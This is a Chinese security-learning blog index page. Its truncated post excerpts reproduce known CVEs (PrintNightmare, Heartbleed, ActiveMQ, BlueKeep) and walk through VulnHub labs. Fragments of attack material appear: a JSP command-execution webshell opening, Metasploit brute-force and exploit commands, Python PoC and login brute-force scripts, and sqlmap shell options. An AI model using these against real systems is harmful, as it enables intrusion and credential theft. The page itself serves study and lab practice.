自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(82)
  • 收藏
  • 关注

原创 复现myucms v2.1.1022漏洞

myucms漏洞复现

2022-08-19 11:36:29 1737 1

原创 vue常用全局api

directive用法:案例:<html><head></head><body> <div id="app"> <div v-color="color"> 自定义指令变色 </div> </div> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/vue.js"></script> &l

2021-08-17 16:29:44 217

原创 vue父子组件的传值

父传子案例:<html><head></head><body> <div id="app"> <f></f> </div> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/vue.js"></script> <script type="x-template" id="f"> &

2021-08-16 18:11:16 211

原创 Vue.component用法

用法:Vue.component( id, [definition] )参数:{string} id{Function | Object} [definition]具体参考:https://vuejs.bootcss.com/api/?#Vue-component案例:<html><head>Vue.js</head><body> <div id="app"> <div> <miao>&l

2021-08-16 16:11:17 533

原创 微软通杀漏洞-CVE-2021-1675复现

环境win2008受害机IP:10.20.102.80kali攻击机IP:10.20.102.71需要一个普通的域用户,开启Spooler服务安装impacketgit clone https://github.com/cube0x0/impacketcd impacketsudo python3 ./setup.py install开启匿名访问smb配置/etc/samba/smb.conf[global]map to guest = Bad Userserver rol

2021-07-14 16:08:07 380

原创 01 ATT&CK红队靶场

1

2021-05-31 17:14:26 300 2

原创 复现锐捷RG-UAC系统账号密码信息泄露漏洞编写poc/exp(CNVD-2021-14536)

漏洞演示访问地址f12查看源代码md5解码:md5加密解码40b5daa2352b825d66b8080617408284reach123登录成功poc/exp验证import requestsimport redef start(headers): with open("1.txt", "r") as f: for f1 in f: f2 = f1.strip() try:

2021-04-10 18:03:17 719 3

原创 dvwa学习编写exp

sql注入报错expimport requestsimport re//cookie验证登录cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'}//可能存在sql注入地址url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1"//index()函数用于从列表中找出某个值第一个匹配项的索引位置//split()通过指定分

2021-04-09 20:17:12 269 2

原创 整理应急响应的流程

网络安全的应急响应windows检查:1.系统进程2.计算机用户3.系统登录日志4.连接状态5.开机自启动6.数据库日志7.网站木马和系统木马linux检查:同上网络安全的调查取证流程:1.保护现场2.证据发现3.证据固定4.证据提取5.证据分析6.提交证据网络安全的网络取证工具:wireshark...

2021-03-21 10:55:49 370

原创 CVE-2015-5254(ActiveMQ 反序列化漏洞)复现

漏洞介绍Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。漏洞复现http://10.7.10.41:8161/admin默认账号密码:admin登陆成功

2021-03-19 11:41:53 380 2

原创 Tomcat弱口令+war部署getshell

影响版本全版本漏洞复现msf爆破use auxiliary/scanner/http/tomcat_mgr_login设置IP和端口set rhosts 10.7.10.41set rport 8080(默认端口)run运行tomcat:tomcat登陆成功用大佬的jsp一句话马<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtim

2021-03-18 11:34:52 202 1

原创 CVE-2017-15715(apache换行解析漏洞)复现

漏洞解析此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全策略。漏洞复现访问地址制作一句话木马上传木马抓包在这里插入图片描述添加个0a...

2021-03-18 10:26:53 435

原创 CVE-2014-0160(OpenSSL心脏滴血漏洞)

漏洞背景早在2014年,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞。在黑客社区,它被命名为“心脏出血”,表明网络上出现了“致命内伤”。利用该漏洞,黑客可以获取约30%的https开头网址的用户登录账号密码,其中包括购物、网银、社交、门户等类型的知名网站。Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就

2021-03-17 17:01:11 721

原创 CVE-2017-7525(jackson反序列漏洞)

漏洞原理Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。详见:https://blog.csdn.net/x

2021-03-17 15:11:24 820

原创 windows本地提权CVE-2018-8120复现

漏洞描述部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码影响版本:Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service

2021-03-12 14:16:39 173

原创 java小案例

Scanner类计算package com.demo;import java.util.Scanner; //导入包public class hello { public static void main(String[] args) { Scanner sc = new Scanner(System.in); //使用类先创建对象 System.out.println("请输入第一个数:"); int i = sc.nextInt();

2021-03-09 16:18:58 186

原创 docker命令学习

docker容器docker ps:查看容器运行docker ps -a:查看所有容器运行docker ps -l:查询最后安装的容器docker run:运行docker logs:查看容器内的标准输出docker stop:停止容器docker restart:重启docker top:查看容器内部运行的进程docker rm -f 1e560fca3906:删除容器docker port bf08b7f2cd89:查看容器端口的映射情况进入容器: 1. docker att

2021-03-08 16:14:05 145

原创 win10安装docker程序

开启 Hyper-V控制面板 --- 程序 --- 程序和功能 --- 启用和关闭windows功能 --- hype -vdocker下载地址:https://hub.docker.com/?overlay=onboarding安装重启打开 PowerShell 并运行以下命令检测是否运行成功:docker run hello-worlddocker映像加速https://www.runoob.com/docker/docker-mirror-acceleration.html.

2021-03-08 11:33:24 101

原创 MS14-064 漏洞复现

背景Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本…模块:exploit/windows/browser/ms14_064_ole_code_execution复现系统IPlinux10.7.10.43win710.7.10.49msf6 > search ms14-064

2021-03-05 16:56:36 752

原创 Bagecms v3.1.3代码审计

先复现下大佬挖到的漏洞任意文件读取漏洞点:protected\modules\admini\controllers\TemplateController.php如下actionUpdateTpl函数调用了file_get_contents对传入的filename文件名的文件内容进行读取,如下filename参数在传入file_get_contents函数之前调用CHtml::encode方法进行了处理。跟进CHtml::encode方法路径:framework\yiilite.php发

2021-03-04 13:26:08 884 2

转载 CVE-2021-21972Vmware远程代码执行漏洞复现

背景vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCen

2021-03-03 14:08:20 1057

原创 VulnHub之dc1靶场(3)

靶场信息:地址:https://www.vulnhub.com/entry/dc-1-1,292/难度:简单目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志运行:vm work信息收集nmap直接扫描网段存活主机扫描常见端口nmap 10.7.10.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 ESTNmap scan report for 10.7.10.29Host is u

2021-02-20 10:28:08 194

原创 VulnHub之GoldenEye靶场(2)

靶场信息:地址:https://www.vulnhub.com/entry/goldeneye-1,240/难度:简单目标:root目录下flag.txt 文件运行:VirtualBox(网络桥接)信息收集老规矩上来先扫描端口常见端口开放25、80、110端口,访问网站,爆下目录(无果),随便爆破一下25端口的弱口令(无果)中间件:apache然后通过上面得提示访问/sev-home/这个目录,有登陆但是没有密码,这里我打算爆破来着,f12源代码里面有有趣得对话,这里莫非是让

2021-02-19 16:24:46 224 2

原创 linux忘记root密码解决

开启此虚拟机,选择第二个然后按e键未修改页面重点:ro改为rw 然后在后面打上init=/bin/bash按下f10按下f10跳到这个页面,选择下面的回车成功:直接passwd修改密码第一次输入密码:第二次确定密码:然后重启,输入root和自己设置的密码。...

2021-02-11 10:38:34 94 2

原创 VulnHub之y0usef靶场(1)

场信息:地址:https://www.vulnhub.com/entry/y0usef-1,624/发布日期:2020年12月10日难度:简单目标:user.txt和root.txt运行:VirtualBox(网络桥接)信息收集Web 服务器: Apache 2.4.10编程语言: PHP 5.5.9操作系统: Ubuntunmap扫描一下nmap 192.168.1.0/24Nmap scan report for 192.168.1.50Host is u

2021-02-08 09:36:09 387

原创 CVE-2019-0708漏洞复现

前期准备系统IPlinux192.168.1.56win7192.168.1.57然后打开win7的3389远程连接服务验证漏洞可以已经开放了3389远程服务,验证是否存在0708漏洞┌──(kali㉿kali)-[~]└─$ nmap 192.168.1.57 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-07 01:32 ESTNmap scan report for 1

2021-02-07 14:52:59 1500

原创 redis未授权漏洞搭建与复现

redis介绍Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。redis未授权漏洞Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问

2021-02-04 16:28:10 364

原创 python之scrapy框架

介绍linux下安装找到python目录,可以使用命令列出当前所有python版本的路径whereis python进入到python的目录中cd 目录更新一下sudo apt update安装pipsudo apt install python3-pip然后安装scrapypip install scrapy验证一下:创建工程scrapy startproject test1设置爬取字段、设置保存爬取内容、设置文件如:user-Agent爬取案例..

2021-01-28 17:11:14 75

原创 IIS PUT漏洞原理和复现

漏洞成因IIS server在WEB服务拓展中开启了WebDAV,配置了写入权限,脚本资源访问权限。导致任意文件上传本地搭建首先允许webDAV查看IP命令为ipconfig把IP地址调整为这台机器的IP地址返回访问该IP因为这里主要是为了锻炼写POC,当然也可以直接使用桂林老兵验证直接写shellPOC验证POC验证:import requestsurl = "http://IP"r = requests.options(url)result = r.headers[

2021-01-27 17:28:01 567

原创 通过python写脚本简单爆破web页面登陆

GET传参import requestsurl = ""payload = {'username':'admin','password':'admin','submit':'登陆'}r = requests.get(url,params=payload)result = r.contentif str(result).find('成功'): print("admin:admin")POST传参import requestsurl = ""data = {'username

2021-01-27 13:32:28 956

原创 SQLmap注入获取Webshell常见命令

sqlmap获取shell常见命令–is-dba:判断是否有dba权限–os-shell:获取系统交互命令–sql-shell:获取数据库交互命令–password:枚举数据库管理系统用户密码哈希值参考:https://www.cnblogs.com/fzblog/p/13800604.html...

2021-01-22 11:33:06 1011

原创 一次复现审计ThinkPHP5.0.15版本的sql注入

关于tp框架ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。

2021-01-22 10:04:06 288

原创 分析ARP攻击与欺骗

ARP协议地址解析协议:将一个已知的IP地址解析成Mac地址广播与广播域概述广播与广播域1.广播:将广播地址做为目的地址的数据帧2.广播域:网络中能接受到同一个广播所有节点的集合Mac地址广播广播地址为:FF-FF-FF-FF-FF-FFIP地址广播1.255.255.255.2552.广播IP地址为IP地址网段的广播地址(192.168.1.255/24)...

2021-01-14 12:00:38 365

原创 虚拟机linux添加共享文件

点击虚拟机上方的tools

2021-01-08 11:07:54 176

原创 部署DNS服务器

前期准备系统xp用户机03服务器安装DNS首先固定一下03的IP地址打开我的电脑 — 双击CD驱动器(有问题,可以查看部署DHCP服务器那篇文章)https://blog.csdn.net/p_utao/article/details/112173574步骤:1.点击安装可选的windows组件2.往下滑找到网络服务3.双击打开网络服务,选择DNS4.安装正向DNS配置然后在开始菜单中的管理工具里找到DNS点击正向查找区域,新建区域这里有

2021-01-04 16:36:46 286

原创 部署DHCP服务器

前期准备系统xp用户机03服务器安装DHCP首先查看xp的连接状态,可以看到当前没有找到DHCP服务器打开03在开始菜单 — 管理工具中找DHCP服务器,如果没有的话,可以找虚拟机中加载光驱或者去百度下载回到03系统打开我的电脑双击打开CD驱动器,点击安装可选的windows组件会弹出一个窗口,往下滑找到网络服务双击打开网络服务,弹出选择DHCP给03系统的设置一个IP地址,然后点击确定 — 下一步 — 安装完成设置地址池/作用域开始菜单

2021-01-04 14:25:58 375

原创 计算机网络知识

IP地址详解局域网:一般称为内网简单局域网的构成:交换机、网线、PC交换机:用来组建内网的局域网的设备1.IP地址IP地址就是一个唯一标识,是一段网络编码(二进制)IP地址的范围:0-2552.子网掩码局域网通信规则:在同一个局域网中,所有的IP必须在同一网段中才可以互相通信IP地址构成:网络位+主机位(网络位相同的IP地址,为同一网段)子网掩码:用来确定IP地址的网络位子网掩码如何确定网络位:与255对应的数字为网络位,与0对应的数字为主机位3.IP地址分类A类:1

2020-12-31 15:16:49 368

原创 kindeditor编辑器<=4.1.5上传漏洞复现

前期谷歌语法搜索inurl:/examples/uploadbutton.htmlinurl:/php/upload_json.phpinurl:/asp.net/upload_json.ashxinurl://jsp/upload_json.jspinurl://asp/upload_json.aspinurl:gov.cn/kindeditor/首先一定要看脚本语言,对症下药/asp/upload_json.asp/asp.net/upload_json.ashx/

2020-12-11 19:27:49 953 1

原创 复现phpstudy2018后门漏洞

影响版本phpstudy 2016版php-5.4phpstudy 2018版php-5.2.17phpstudy 2018版php-5.4.45后门分析地址:C:\phpStudy\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll本地复现phpstudy版本php版本20185.2.17大佬的expGET /index.php HTTP/1.1Host: yourip.comCache-Control: max-

2020-11-30 20:00:55 504

原创 内网攻击域渗透学习(笔记)

信息收集有了内网的第一台机器的权限后,就到了很关键的一步信息收集,它也是内网渗透中不可或缺的一部分。查看当前机器的网络环境,收集域里的相关信息,包括所有的用户、所有的计算机,以及相关关键组的信息。net user/domain:查看域用户net view/domain:查看有几个域net view/domain:xxx:查看域内的主机net group/domain:查看域里面的组net group "domain computers" /domain:查看域内所有的主机名net group

2020-11-27 19:48:06 1388

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除